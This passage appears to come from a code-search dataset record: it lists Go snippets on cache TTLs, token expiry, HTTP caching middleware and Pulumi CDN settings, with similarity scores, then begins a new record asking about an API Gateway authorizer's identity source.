resp.Header.Get(key))\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tAddCacheHeader(w.Header())\n\t\t\t\t\t\t\tw.WriteHeader(resp.StatusCode)\n\t\t\t\t\t\t\tw.Write(resp.Body)\n\n\t\t\t\t\t\t\treturn\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\tdata, _ := cw.ReadAll()\n\t\t\t\t\t\tw.WriteHeader(cw.statusCode)\n\t\t\t\t\t\tw.Write(data)\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\t// covers cases where previous responses were cached\n\t\t\t\t_ = c.Del(ctx, cacheKey)\n\n\t\t\t\t// response has been written, end early\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tbody, err := cw.ReadAll()\n\t\t\tif err != nil {\n\t\t\t\tlog.Err(err).Msg(\"Failed to read cache buffer\")\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tcachedResp := CachedResponse{\n\t\t\t\tcw.Header().Clone(),\n\t\t\t\tbody,\n\t\t\t\tcw.statusCode,\n\t\t\t\ttime.Now().Unix() + int64(opts.TTL),\n\t\t\t}\n\n\t\t\tdata, err = json.Marshal(&cachedResp)\n\t\t\tif err != nil {\n\t\t\t\tlog.Err(err).Msg(\"Failed to marshal cached response\")\n\t\t\t\twrite.Error(w, err.Error(), http.StatusInternalServerError)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\t// store response in cache\n\t\t\terr = c.Set(ctx, cacheKey, data, opts.StaleTTL)\n\t\t\tif err != nil {\n\t\t\t\tlog.Err(err).Msg(\"Failed to set data in cache\")\n\t\t\t}\n\t\t})\n\t}\n}", "func (b *BuntBackend) TTL(ttl time.Duration) *BuntBackend {\n\tb.ttl = ttl\n\treturn b\n}", "func (v *Value) TTL() time.Duration { return dnsutil.MinTTL(v.msg) }", "func (c *Cache) Put(jwt *token.JWT) (int, error) {\n\tvar l int\n\terr := c.doSync(func() {\n\t\tif c.entries == nil {\n\t\t\tl = 0\n\t\t\treturn\n\t\t}\n\t\tif jwt.IsValid(c.leeway) {\n\t\t\tc.entries[jwt.String()] = &cacheEntry{jwt, time.Now()}\n\t\t\tlenEntries := len(c.entries)\n\t\t\tif lenEntries > c.maxEntries {\n\t\t\t\tttl := int64(c.ttl) / int64(lenEntries) * int64(c.maxEntries)\n\t\t\t\tc.cleanup(time.Duration(ttl))\n\t\t\t}\n\t\t}\n\t\tl = len(c.entries)\n\t}, defaultTimeout)\n\treturn l, err\n}", "func (o BackendServiceCdnPolicyOutput) DefaultTtl() pulumi.IntPtrOutput {\n\treturn o.ApplyT(func(v BackendServiceCdnPolicy) *int { return v.DefaultTtl }).(pulumi.IntPtrOutput)\n}", "func (tx *Tx) TTL(key string) (ttl int64) {\n\tdeadline := tx.db.getTTL(String, key)\n\tif deadline == nil {\n\t\treturn\n\t}\n\n\tif tx.db.hasExpired(key, String) {\n\t\ttx.db.evict(key, String)\n\t\treturn\n\t}\n\n\treturn deadline.(int64) - time.Now().Unix()\n}", "func (c *Cache) SetTTL(cacheKey string, ttl time.Duration) {\n\tc.client.Expire(cacheKey, ttl)\n}", "func KeyTTL(maxRequestedTTL time.Duration, numKeys int) time.Duration {\n\toffset := int(maxRequestedTTL.Seconds()) / numKeys\n\treturn maxRequestedTTL + time.Second*time.Duration(offset+1)\n}", "func (o BackendServiceCdnPolicyOutput) ClientTtl() pulumi.IntPtrOutput {\n\treturn o.ApplyT(func(v BackendServiceCdnPolicy) *int { return v.ClientTtl }).(pulumi.IntPtrOutput)\n}", "func (a *Authorization) Expiry() time.Time {\n\tif a.timestamp == 0 {\n\t\treturn time.Time{}\n\t}\n\treturn time.Unix(a.timestamp, 0)\n}", "func (s *AppServerV3) Expiry() time.Time {\n\treturn s.Metadata.Expiry()\n}", "func (f *lazyCallReq) SetTTL(d time.Duration) {\n\tttl := uint32(d / time.Millisecond)\n\tbinary.BigEndian.PutUint32(f.Payload[_ttlIndex:_ttlIndex+_ttlLen], ttl)\n}", "func WithCacheTTL(value time.Duration) Option {\n\treturn func(m *Memo) {\n\t\tif m.frozen {\n\t\t\tpanic(\"Trying to modify a memoizer after it has been instantiated\")\n\t\t}\n\t\tm.ttl = value\n\t}\n}", "func (s *DatabaseServerV3) Expiry() time.Time {\n\treturn s.Metadata.Expiry()\n}", "func (o BackendBucketCdnPolicyOutput) DefaultTtl() pulumi.IntPtrOutput {\n\treturn o.ApplyT(func(v BackendBucketCdnPolicy) *int { return v.DefaultTtl }).(pulumi.IntPtrOutput)\n}", "func New(timeout time.Duration, cache GetSetter) Throttler {\n\tsalt, err := randomBytes(16)\n\tif err != nil {\n\t\tpanic(\"cannot initialize rate limiter\")\n\t}\n\treturn &Limiter{\n\t\tcache: cache,\n\t\ttimeout: timeout,\n\t\tsalt: salt,\n\t}\n}", "func (h *handler) ttlKeepAlive(k string, ttl int, stop chan bool) {\n\tfor {\n\t\tselect {\n\t\tcase <-time.After(time.Duration(ttl / 2) * time.Second):\n\t\t\th.client.Update(k, \"-\", uint64(ttl))\n\t\tcase <-stop:\n\t\t\treturn\n\t\t}\n\t}\n}", "func (c *conn) curate() error {\n\tc.cacheMu.Lock()\n\tdefer c.cacheMu.Unlock()\n\tlog.Info(\"Curating cache\")\n\tfor key, val := range c.cache {\n\t\tif time.Now().Sub(val.modifiedAt).Seconds() > c.cachettl {\n\t\t\tdelete(c.cache, key)\n\t\t}\n\t}\n\treturn nil\n}", "func (v value) expired(c *Cache) bool{\n return time.Since(v.time)>c.expire\n}", "func (o BackendBucketCdnPolicyOutput) ClientTtl() pulumi.IntPtrOutput {\n\treturn o.ApplyT(func(v BackendBucketCdnPolicy) *int { return v.ClientTtl }).(pulumi.IntPtrOutput)\n}", "func timeExpired() int64 {\n\ttimeExpired := timeStamp() + 60\n\n\treturn timeExpired\n}", "func (o BackendServiceCdnPolicyResponseOutput) MaxTtl() pulumi.IntOutput {\n\treturn o.ApplyT(func(v BackendServiceCdnPolicyResponse) int { return v.MaxTtl }).(pulumi.IntOutput)\n}", "func (o BackendServiceCdnPolicyResponsePtrOutput) DefaultTtl() pulumi.IntPtrOutput {\n\treturn o.ApplyT(func(v *BackendServiceCdnPolicyResponse) *int {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn &v.DefaultTtl\n\t}).(pulumi.IntPtrOutput)\n}", "func (c *ExpireCache) Size() int64 {\n\tdefer c.mutex.Unlock()\n\tc.mutex.Lock()\n\treturn int64(len(c.cache))\n}", "func (c *Cache) cleanup(ttl time.Duration) {\n\tvalids := map[string]*cacheEntry{}\n\tnow := time.Now()\n\tfor token, entry := range c.entries {\n\t\tif entry.jwt.IsValid(c.leeway) {\n\t\t\tif entry.accessed.Add(ttl).After(now) {\n\t\t\t\t// Everything fine.\n\t\t\t\tvalids[token] = entry\n\t\t\t}\n\t\t}\n\t}\n\tc.entries = valids\n}", "func TestInfoStoreGetInfoTTL(t *testing.T) {\n\tdefer leaktest.AfterTest(t)()\n\tstopper := stop.NewStopper()\n\tdefer stopper.Stop()\n\tis := newInfoStore(1, emptyAddr, stopper)\n\ti := is.newInfo(nil, time.Nanosecond)\n\tif err := is.addInfo(\"a\", i); err != nil {\n\t\tt.Error(err)\n\t}\n\ttime.Sleep(time.Nanosecond)\n\tif is.getInfo(\"a\") != nil {\n\t\tt.Error(\"shouldn't be able to get info with short TTL\")\n\t}\n}", "func WithAuthTimeMaxAge(maxAge time.Duration) VerifierOption {\n\treturn func(v *idTokenVerifier) {\n\t\tv.maxAge = maxAge\n\t}\n}", "func (a *auth) Expires() (t time.Time) {\n\tif do, ok := a.parentAuth.(swift.Expireser); ok {\n\t\tt = do.Expires()\n\t}\n\treturn t\n}", "func HTTPTimeout(duration time.Duration) HTTPOption {\n\treturn func(c *HTTPCollector) { c.client.Timeout = duration }\n}", "func TestDigestPurgeTTL(t *testing.T) {\n\tt.Parallel()\n\n\tnClients := 4\n\tclients := make(map[string]*digestClient, nClients)\n\tfor i := 0; i < nClients; i++ {\n\t\tclients[string(i)] = &digestClient{\n\t\t\tlastSeen: time.Now().Add(time.Duration(-i) * time.Hour).UnixNano(),\n\t\t}\n\t}\n\n\tsecrets := HtdigestFileProvider(\"test.htdigest\")\n\tpurgeTTLHours := 2\n\tda := &DigestAuth{\n\t\tOpaque: \"U7H+ier3Ae8Skd/g\",\n\t\tRealm: \"example.com\",\n\t\tSecrets: secrets,\n\t\tClientCacheTolerance: 2,\n\t\tClientCacheTTL: time.Hour * time.Duration(purgeTTLHours),\n\t\tclients: clients,\n\t}\n\n\t// Wait a second before we purge to ensure the correct number of client\n\t// entries \"expire\".\n\ttime.Sleep(time.Second)\n\tda.Purge()\n\n\tif len(da.clients) != 2 {\n\t\tt.Fatalf(\"expected %d client entries, got %d\", 2, len(da.clients))\n\t}\n\n\tfor _, client := range da.clients {\n\t\tif time.Unix(0, client.lastSeen).Before(time.Now().Add(time.Duration(-purgeTTLHours) * time.Hour)) {\n\t\t\tt.Fatalf(\"expected entry with lastSeen time of %d to have been purged\", client.lastSeen)\n\t\t}\n\t}\n}", "func TestLoginExpires(t *testing.T) {\n\tc, _, secret := loginHelper(t, \"2s\")\n\n\t// Make sure token is valid\n\t_, err := c.AuthAPIClient.GetAdmins(c.Ctx(), &auth.GetAdminsRequest{})\n\tif err != nil {\n\t\tt.Fatalf(err.Error())\n\t}\n\n\t// Wait for TTL to expire and check that token is no longer valid\n\ttime.Sleep(time.Duration(secret.LeaseDuration+1) * time.Second)\n\t_, err = c.AuthAPIClient.GetAdmins(c.Ctx(), &auth.GetAdminsRequest{})\n\tif err == nil {\n\t\tt.Fatalf(\"API call should fail, but token did not expire\")\n\t}\n}", "func (o AuthBackendRoleOutput) TokenTtl() pulumi.IntPtrOutput {\n\treturn o.ApplyT(func(v *AuthBackendRole) pulumi.IntPtrOutput { return v.TokenTtl }).(pulumi.IntPtrOutput)\n}", "func getCollectionTTL(properties map[string]string) (time.Duration, error) {\n\tv, ok := properties[common.CollectionTTLConfigKey]\n\tif ok {\n\t\tttl, err := strconv.Atoi(v)\n\t\tif err != nil {\n\t\t\treturn -1, err\n\t\t}\n\t\treturn time.Duration(ttl) * time.Second, nil\n\t}\n\n\treturn Params.CommonCfg.EntityExpirationTTL.GetAsDuration(time.Second), nil\n}", "func cacheTTL(m *dns.Msg) (ttl uint32) {\n\tswitch {\n\tcase m == nil:\n\t\treturn 0\n\tcase m.Truncated:\n\t\tlog.Debug(\"dnsproxy: cache: truncated message; not caching\")\n\n\t\treturn 0\n\tcase len(m.Question) != 1:\n\t\tlog.Debug(\"dnsproxy: cache: message with wrong number of questions; not caching\")\n\n\t\treturn 0\n\tdefault:\n\t\tttl = calculateTTL(m)\n\t\tif ttl == 0 {\n\t\t\tlog.Debug(\"dnsproxy: cache: ttl calculated to be 0; not caching\")\n\n\t\t\treturn 0\n\t\t}\n\t}\n\n\tswitch rcode := m.Rcode; rcode {\n\tcase dns.RcodeSuccess:\n\t\tif isCacheableSucceded(m) {\n\t\t\treturn ttl\n\t\t}\n\n\t\tlog.Debug(\"dnsproxy: cache: not a cacheable noerror response; not caching\")\n\tcase dns.RcodeNameError:\n\t\tif isCacheableNegative(m) {\n\t\t\treturn ttl\n\t\t}\n\n\t\tlog.Debug(\"dnsproxy: cache: not a cacheable nxdomain response; not caching\")\n\tcase dns.RcodeServerFailure:\n\t\treturn ttl\n\tdefault:\n\t\tlog.Debug(\"dnsproxy: cache: response code %s; not caching\", dns.RcodeToString[rcode])\n\t}\n\n\treturn 0\n}", "func (r Response) updateTtl(rr dns.RR) {\n\tif r.IsExpired(rr) {\n\t\tLogger.Log(NewLogMessage(\n\t\t\tDEBUG,\n\t\t\tLogContext{\n\t\t\t\t\"what\": Logger.Sprintf(DEBUG, \"attempted to update TTL on rr [%v] using response [%v]\", rr, r),\n\t\t\t},\n\t\t\tnil,\n\t\t))\n\t\treturn\n\t}\n\texpirationTime := r.GetExpirationTimeFromRR(rr)\n\tttl := expirationTime.Sub(time.Now()).Seconds()\n\tcastTtl := uint32(ttl)\n\tLogger.Log(NewLogMessage(\n\t\tDEBUG,\n\t\tLogContext{\n\t\t\t\"what\": \"updating cached TTL\",\n\t\t\t\"ttl\": string(castTtl),\n\t\t},\n\t\tfunc() string { return fmt.Sprintf(\"rr [%v] ttl [%f] casted ttl [%d]\", rr, ttl, castTtl) },\n\t))\n\trr.Header().Ttl = uint32(ttl)\n}", "func ExpiresAt(d time.Duration) time.Time {\n\treturn time.Now().Add(d)\n}", "func (o SslCertOutput) ExpirationTime() pulumi.StringOutput {\n\treturn o.ApplyT(func(v *SslCert) pulumi.StringOutput { return v.ExpirationTime }).(pulumi.StringOutput)\n}", "func (o BackendBucketCdnPolicyResponsePtrOutput) DefaultTtl() pulumi.IntPtrOutput {\n\treturn o.ApplyT(func(v *BackendBucketCdnPolicyResponse) *int {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn &v.DefaultTtl\n\t}).(pulumi.IntPtrOutput)\n}", "func (c *Memcache) Fresh() bool {\n\tc.Lock()\n\tdefer c.Unlock()\n\tif c.created.IsZero() {\n\t\treturn false\n\t}\n\tif time.Since(c.created) < c.TTL {\n\t\treturn true\n\t}\n\treturn false\n}", "func (c *ConfigCache) Initialise(TTL int64) (error) {\n log.Println(\"Initialising ConfigCache with new TTL: +v\", TTL)\n err := c.FetchAndConvertBaseFareList()\n if err != nil {\n return err\n }\n err = c.FetchAndConvertDriverAgeFactorList()\n if err != nil {\n return err\n }\n err = c.FetchAndConvertInsuranceGroupFactorList()\n if err != nil {\n return err\n }\n err = c.FetchAndConvertLicenceValidityFactorList()\n if err != nil {\n return err\n }\n c.TimeToLive = time.Now().Unix() + TTL // time to live in epoch seconds\n return nil\n}", "func (o BackendBucketCdnPolicyResponseOutput) MaxTtl() pulumi.IntOutput {\n\treturn o.ApplyT(func(v BackendBucketCdnPolicyResponse) int { return v.MaxTtl }).(pulumi.IntOutput)\n}", "func NewTimedcache(ttl time.Duration, getter GetFunc) (*TimedCache, error) {\n\tif getter == nil {\n\t\treturn nil, fmt.Errorf(\"getter is not provided\")\n\t}\n\n\treturn &TimedCache{\n\t\tGetter: getter,\n\t\t// switch to using NewStore instead of NewTTLStore so that we can\n\t\t// reuse entries for calls that are fine with reading expired/stalled data.\n\t\t// with NewTTLStore, entries are not returned if they have already expired.\n\t\tStore: cache.NewStore(cacheKeyFunc),\n\t\tTTL: ttl,\n\t}, nil\n}", "func (c *Cookie) MaxAge(seconds int) *Cookie { c.maxAge = seconds; return c }", "func verifyCacheExpiration(t *testing.T, sweepSettings cache.SweepSettings, wantEvicted []blob.ID) {\n\tcacheData := blobtesting.DataMap{}\n\n\t// on Windows, the time does not always move forward (sometimes clock.Now() returns exactly the same value for consecutive invocations)\n\t// this matters here so we return a fake clock.Now() function that always moves forward.\n\tvar currentTimeMutex sync.Mutex\n\n\tcurrentTime := clock.Now()\n\n\tmovingTimeFunc := func() time.Time {\n\t\tcurrentTimeMutex.Lock()\n\t\tdefer currentTimeMutex.Unlock()\n\n\t\tcurrentTime = currentTime.Add(1 * time.Millisecond)\n\n\t\treturn currentTime\n\t}\n\tcacheStorage := blobtesting.NewMapStorage(cacheData, nil, movingTimeFunc)\n\n\tunderlyingStorage := newUnderlyingStorageForContentCacheTesting(t)\n\n\tctx := testlogging.Context(t)\n\tcc, err := cache.NewContentCache(ctx, underlyingStorage, cache.Options{\n\t\tStorage: cacheStorage.(cache.Storage),\n\t\tSweep: sweepSettings,\n\t\tTimeNow: movingTimeFunc,\n\t}, nil)\n\n\trequire.NoError(t, err)\n\n\tdefer cc.Close(ctx)\n\n\tvar tmp gather.WriteBuffer\n\tdefer tmp.Close()\n\n\tconst underlyingBlobID = \"content-4k\"\n\n\terr = cc.GetContent(ctx, \"a\", underlyingBlobID, 0, -1, &tmp) // 4k\n\trequire.NoError(t, err)\n\terr = cc.GetContent(ctx, \"b\", underlyingBlobID, 0, -1, &tmp) // 4k\n\trequire.NoError(t, err)\n\terr = cc.GetContent(ctx, \"c\", underlyingBlobID, 0, -1, &tmp) // 4k\n\trequire.NoError(t, err)\n\terr = cc.GetContent(ctx, \"d\", underlyingBlobID, 0, -1, &tmp) // 4k\n\trequire.NoError(t, err)\n\n\t// delete underlying storage blob to identify cache items that have been evicted\n\t// all other items will be fetched from the cache.\n\trequire.NoError(t, underlyingStorage.DeleteBlob(ctx, underlyingBlobID))\n\n\tfor _, blobID := range []blob.ID{\"a\", \"b\", \"c\", \"d\"} {\n\t\tif slices.Contains(wantEvicted, blobID) {\n\t\t\trequire.ErrorIs(t, cc.GetContent(ctx, string(blobID), underlyingBlobID, 0, -1, &tmp), blob.ErrBlobNotFound, \"expected item not found %v\", blobID)\n\t\t} else {\n\t\t\trequire.NoError(t, cc.GetContent(ctx, string(blobID), underlyingBlobID, 0, -1, &tmp), \"expected item to be found %v\", blobID)\n\t\t}\n\t}\n}", "func (c *Client) Middleware(next http.Handler) http.Handler {\n\treturn http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\tif r.Method == \"GET\" || r.Method == \"\" {\n\t\t\tprefix, key := c.GeneratePrefixAndKey(r)\n\t\t\tctxlog := c.log.WithFields(log.Fields{\"prefix\": prefix, \"key\": key})\n\t\t\tparams := r.URL.Query()\n\t\t\tif _, ok := params[c.refreshKey]; ok {\n\t\t\t\tctxlog.Debug(\"refresh key found, releasing\")\n\t\t\t\tdelete(params, c.refreshKey)\n\n\t\t\t\tr.URL.RawQuery = params.Encode()\n\t\t\t\tkey = generateKey(r.URL.String())\n\n\t\t\t\tc.adapter.Release(prefix, key)\n\t\t\t} else {\n\t\t\t\tb, ok := c.adapter.Get(prefix, key)\n\t\t\t\tresponse := BytesToResponse(b)\n\t\t\t\tif ok {\n\t\t\t\t\tif response.Expiration.After(time.Now()) {\n\t\t\t\t\t\tctxlog.Debug(\"serving from cache\")\n\t\t\t\t\t\tresponse.LastAccess = time.Now()\n\t\t\t\t\t\tresponse.Frequency++\n\t\t\t\t\t\tc.adapter.Set(prefix, key, response.Bytes())\n\n\t\t\t\t\t\t//w.WriteHeader(http.StatusNotModified)\n\t\t\t\t\t\tfor k, v := range response.Header {\n\t\t\t\t\t\t\tw.Header().Set(k, strings.Join(v, \",\"))\n\t\t\t\t\t\t}\n\t\t\t\t\t\tw.Header().Set(\"X-Cached-At\", response.CachedAt.Format(time.RFC822Z))\n\t\t\t\t\t\tw.Write(response.Value)\n\t\t\t\t\t\treturn\n\t\t\t\t\t}\n\t\t\t\t\tctxlog.Debug(\"requested object is in cache, but expried - releasing\")\n\t\t\t\t\tc.adapter.Release(prefix, key)\n\t\t\t\t}\n\t\t\t}\n\t\t\tctxlog.Debug(\"requested object is not in cache or expired - taking it from DB\")\n\t\t\tresponse, value := c.PutItemToCache(next, r, prefix, key)\n\t\t\tfor k, v := range response.Header {\n\t\t\t\tw.Header().Set(k, strings.Join(v, \",\"))\n\t\t\t}\n\t\t\tw.Header().Set(\"X-Cached-At\", time.Now().Format(time.RFC822Z))\n\t\t\tw.WriteHeader(response.StatusCode)\n\t\t\tw.Write(value)\n\t\t\treturn\n\t\t}\n\t\tnext.ServeHTTP(w, r)\n\t})\n}", "func TestAuthRequestTimeout(t *testing.T) {\n\trunTest(t, func(s *res.Service) {\n\t\ts.Handle(\"model\", res.Auth(\"method\", func(r res.AuthRequest) {\n\t\t\tr.Timeout(time.Second * 42)\n\t\t\tr.NotFound()\n\t\t}))\n\t}, func(s *restest.Session) {\n\t\treq := s.Auth(\"test.model\", \"method\", nil)\n\t\treq.Response().AssertRawPayload([]byte(`timeout:\"42000\"`))\n\t\treq.Response().AssertError(res.ErrNotFound)\n\t})\n}", "func testExpired(ttl time.Duration) cache.DirtyFunc {\n\treturn func(file storage.FileEntry) bool {\n\t\treturn file.LastModified.Before(time.Now().Add(-ttl))\n\t}\n}", "func (k *keeper) Expire(key string, duration time.Duration) (err error) {\n\tif k.disableCaching {\n\t\treturn nil\n\t}\n\n\tclient := k.connPool.Get()\n\tdefer client.Close()\n\n\t_, err = client.Do(\"EXPIRE\", key, int64(duration.Seconds()))\n\treturn\n}", "func TestLoginTTLParam(t *testing.T) {\n\tvaultClientConfig := vault.DefaultConfig()\n\tvaultClientConfig.Address = vaultAddress\n\tv, err := vault.NewClient(vaultClientConfig)\n\tif err != nil {\n\t\tt.Fatalf(err.Error())\n\t}\n\tv.SetToken(\"root\")\n\n\terr = configurePlugin(t, v, \"\")\n\tif err != nil {\n\t\tt.Fatalf(err.Error())\n\t}\n\n\tvl := v.Logical()\n\tsecret, err := vl.Write(\n\t\tfmt.Sprintf(\"/%v/login/github:bogusgithubusername\", pluginName),\n\t\tmap[string]interface{}{\"ttl\": \"2s\"},\n\t)\n\tif err != nil {\n\t\tt.Fatalf(err.Error())\n\t}\n\tif secret.LeaseDuration <= 0 || secret.LeaseDuration > 2 {\n\t\tt.Fatalf(\"Expected pachyderm token with TTL ~= 2s, but was %ds\", secret.LeaseDuration)\n\t}\n\tpachToken := secret.Data[\"user_token\"].(string)\n\treportedPachdAddress := secret.Data[\"pachd_address\"].(string)\n\tc, err := client.NewFromAddress(reportedPachdAddress)\n\tif err != nil {\n\t\tt.Fatalf(err.Error())\n\t}\n\tc.SetAuthToken(pachToken)\n\t// Make sure token is valid\n\t_, err = c.AuthAPIClient.GetAdmins(c.Ctx(), &auth.GetAdminsRequest{})\n\tif err != nil {\n\t\tt.Fatalf(err.Error())\n\t}\n\t// Wait for TTL to expire and check that token is no longer valid\n\ttime.Sleep(time.Duration(secret.LeaseDuration+1) * time.Second)\n\t_, err = c.AuthAPIClient.GetAdmins(c.Ctx(), &auth.GetAdminsRequest{})\n\tif err == nil {\n\t\tt.Fatalf(\"API call should fail, but token did not expire\")\n\t}\n}" ]
[ "0.5827483", "0.5766706", "0.567723", "0.5667254", "0.562132", "0.56082237", "0.5564176", "0.5538723", "0.5526179", "0.55230135", "0.54945475", "0.54936993", "0.54185873", "0.5330114", "0.5329961", "0.52914006", "0.52701855", "0.5223752", "0.51707166", "0.51675946", "0.5165063", "0.5152438", "0.51517206", "0.51357853", "0.51303995", "0.51303995", "0.51241636", "0.5120699", "0.5102177", "0.5077518", "0.5058493", "0.5051627", "0.5024499", "0.5022307", "0.50041944", "0.5004112", "0.49924198", "0.49796373", "0.49717274", "0.49707302", "0.49673083", "0.49672365", "0.4967166", "0.49457243", "0.49427164", "0.4936987", "0.49353278", "0.49214196", "0.4909158", "0.48842132", "0.4884092", "0.48737237", "0.48695663", "0.4867351", "0.48609677", "0.48581347", "0.48440596", "0.48439148", "0.47941032", "0.4786507", "0.47813848", "0.47811076", "0.47757185", "0.47652206", "0.47621116", "0.47567508", "0.47555998", "0.47539622", "0.47453028", "0.47418267", "0.47336882", "0.4727923", "0.47131076", "0.47038898", "0.47002402", "0.47001675", "0.4699089", "0.46962225", "0.46877104", "0.4687299", "0.46870634", "0.46751645", "0.4664088", "0.46590483", "0.4655428", "0.4653498", "0.46507776", "0.46361038", "0.46328735", "0.4632867", "0.46270326", "0.46233377", "0.46230707", "0.4609767", "0.460422", "0.46001804", "0.45988858", "0.4594277", "0.4594084", "0.45937982" ]
0.5272764
16
The source of the identity in an incoming request. Defaults to `method.request.header.Authorization`. For `REQUEST` type, this may be a commaseparated list of values, including headers, query string parameters and stage variables e.g. `"method.request.header.SomeHeaderName,method.request.querystring.SomeQueryStringName,stageVariables.SomeStageVariableName"`
func (r *Authorizer) IdentitySource() pulumi.StringOutput { return (pulumi.StringOutput)(r.s.State["identitySource"]) }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func caller(req *http.Request) string {\n\treturn req.Header.Get(_httpHeaderUser)\n}", "func (r *Request) Authorization() string {\n\treturn r.request.Header.Get(\"Authorization\")\n}", "func (o LookupAuthorizerResultOutput) IdentitySource() pulumi.StringOutput {\n\treturn o.ApplyT(func(v LookupAuthorizerResult) string { return v.IdentitySource }).(pulumi.StringOutput)\n}", "func (c *client) requestUID(r *http.Request) (string, error) {\n\tjwt := r.Header.Get(\"Authorization\")\n\ttok, err := c.ac.VerifyIDToken(r.Context(), jwt)\n\tif err != nil {\n\t\tfmt.Printf(\"couldn't verify token: %v\", err)\n\t\treturn \"\", errorutil.New(http.StatusUnauthorized, \"request must include valid JWT\")\n\t}\n\treturn tok.UID, nil\n}", "func RequestHeader(ctx *context.Context) string {\n\trequestHeader := (*ctx).Value(KeyRequestHeader)\n\tif requestHeader != nil {\n\t\tv := requestHeader.(string)\n\t\treturn v\n\t}\n\treturn \"\"\n}", "func getTokenFromReq(r *http.Request) string {\n\theader := r.Header.Get(\"Authorization\")\n\ttoken := strings.Split(header, \" \")\n\tif len(token) > 1 {\n\t\treturn token[1]\n\t}\n\treturn \"\"\n}", "func TokenFromRequest(r *http.Request) string {\n\tauth := r.Header.Get(\"Authorization\")\n\tmatches := bearerPattern.FindStringSubmatch(auth)\n\tif len(matches) == 0 {\n\t\treturn \"\"\n\t}\n\treturn matches[1]\n}", "func FromHeader(r *http.Request) (string, error) {\n\tauth := r.Header.Get(HeaderAuthorization)\n\tif auth == \"\" {\n\t\treturn \"\", nil\n\t}\n\n\tauthHeaderParts := strings.Split(auth, \" \")\n\tif len(authHeaderParts) != 2 || strings.ToLower(authHeaderParts[0]) != Bearer {\n\t\treturn \"\", ErrorAuthHeaderFormat\n\t}\n\n\treturn authHeaderParts[1], nil\n}", "func KeyFromClientRequest(req *http.Request) string {\n\tparts := strings.Fields(req.Header.Get(\"Authorisation\"))\n\tif len(parts) != 2 || parts[0] != \"Key\" {\n\t\treturn \"\"\n\t}\n\n\treturn parts[1]\n}", "func getRequestID(c *gin.Context) string {\n\tif id := c.Request.Header.Get(\"x-request-id\"); len(id) > 0 {\n\t\treturn id\n\t}\n\treturn uuid.New().String()\n}", "func RequestID(req *http.Request) string {\n\tif req == nil {\n\t\treturn \"\"\n\t}\n\treqIDContextValue := req.Context().Value(log.ContextreqIDKey)\n\tif reqIDContextValue == nil {\n\t\treturn \"\"\n\t}\n\treturn reqIDContextValue.(string)\n}", "func (t TokenAuth) GetRequestMetadata(ctx context.Context, in ...string) (map[string]string, error) {\n\tvar token string\n\tif md, ok := metadata.FromOutgoingContext(ctx); ok && len(md.Get(\"authorization\")) > 0 {\n\t\ttoken = md.Get(\"authorization\")[0]\n\t} else {\n\t\ttoken = t.Token\n\t}\n\treturn map[string]string{\n\t\t\"authorization\": \"Bearer \" + token,\n\t}, nil\n}", "func RequestID(req *http.Request) string {\n\tid := req.Header.Get(\"X-Request-ID\")\n\tif id == \"\" {\n\t\tn := Sequence(req)\n\t\tid = fmt.Sprintf(\"%d\", n)\n\t}\n\treturn id\n}", "func userId(r *http.Request) string {\n\treturn fmt.Sprintf(\"%v\", r.Context().Value(\"user\"))\n}", "func GetUserIdentity(r *http.Request) (identity string, ok bool) {\n // We use the claimed subject contained in the JWT as the ID.\n jwtUser := r.Context().Value(\"user\")\n if jwtUser == nil {\n return\n }\n var sub interface {}\n sub, ok = jwtUser.(*jwt.Token).Claims.(jwt.MapClaims)[\"sub\"]\n if !ok {\n return\n }\n identity, ok = sub.(string)\n return\n}", "func getToken(r *http.Request) string {\n\treturn r.Header.Get(\"Authorization\")\n}", "func Credentials(request *restful.Request) (string, string, error) {\n\tencoded := request.Request.Header.Get(\"Authorization\")\n\tif len(encoded) > 6 {\n\t\t// [6:] extracts the hash\n\t\treturn decodeCredentials(encoded[6:])\n\t}\n\treturn \"\", \"\", fmt.Errorf(\"[credentials] No credentials found (%v)\\n\", encoded)\n}", "func (req *Request) String() string {\n\tif req == nil {\n\t\treturn \"\"\n\t}\n\n\tuser := \"anonymous\"\n\tuserID := \"0\"\n\tif req.User != nil {\n\t\tuser = req.User.Name\n\t\tuserID = req.User.ID\n\t}\n\n\treturn fmt.Sprintf(`req_id: \"%s\", user: \"%s\", user_id: \"%s\", endpoint: \"%s\", params: %#v`, req.ID, user, userID, req.Endpoint(), req.Params)\n}", "func HeaderRequestID(c *gin.Context) string {\n\treturn c.Request.Header.Get(HeaderXRequestIDKey)\n}", "func parseCurrentUser(r *http.Request) string {\n\tclaims := utilities.GetClaims(\n\t\tr.Header.Get(\"Authorization\")[len(\"Bearer \"):])\n\treturn fmt.Sprintf(\"%v\", claims[\"user_id\"])\n}", "func requestAuthHeaderClaims(r *http.Request) AuthClaims {\n\tauthHdr, prs := r.Header[\"Authorization\"]\n\tif prs {\n\t\tif claims := parseAuthHeader(authHdr); claims != nil {\n\t\t\treturn claims\n\t\t}\n\t}\n\treturn nil\n}", "func (self *ProxyRequest) requestId() string {\n\n\tt := time.Now().Local()\n\n\t// This should provide an extremely low chance to create race conditions.\n\tname := fmt.Sprintf(\n\t\t\"%s-%04d%02d%02d-%02d%02d%02d-%09d\",\n\t\tself.Request.Method,\n\t\tt.Year(),\n\t\tt.Month(),\n\t\tt.Day(),\n\t\tt.Hour(),\n\t\tt.Minute(),\n\t\tt.Second(),\n\t\tt.Nanosecond(),\n\t)\n\n\treturn name\n}", "func (t tokenAuth) GetRequestMetadata(ctx context.Context, in ...string) (map[string]string, error) {\n\treturn map[string]string{\n\t\t\"authorization\": \"Bearer \" + t.token,\n\t}, nil\n}", "func CorrelationIDForRequest(request *http.Request) string {\n\tfor _, header := range CorrelationIDHeaders {\n\t\theaderValue := request.Header.Get(header)\n\t\tif headerValue != \"\" && headerValue != \"-\" {\n\t\t\treturn headerValue\n\t\t}\n\t}\n\tnewCorrelationID := \"\"\n\tuuids, err := uuid.NewV4()\n\tif err == nil {\n\t\tnewCorrelationID = uuids.String()\n\t\trequest.Header.Set(CorrelationIDHeaders[0], 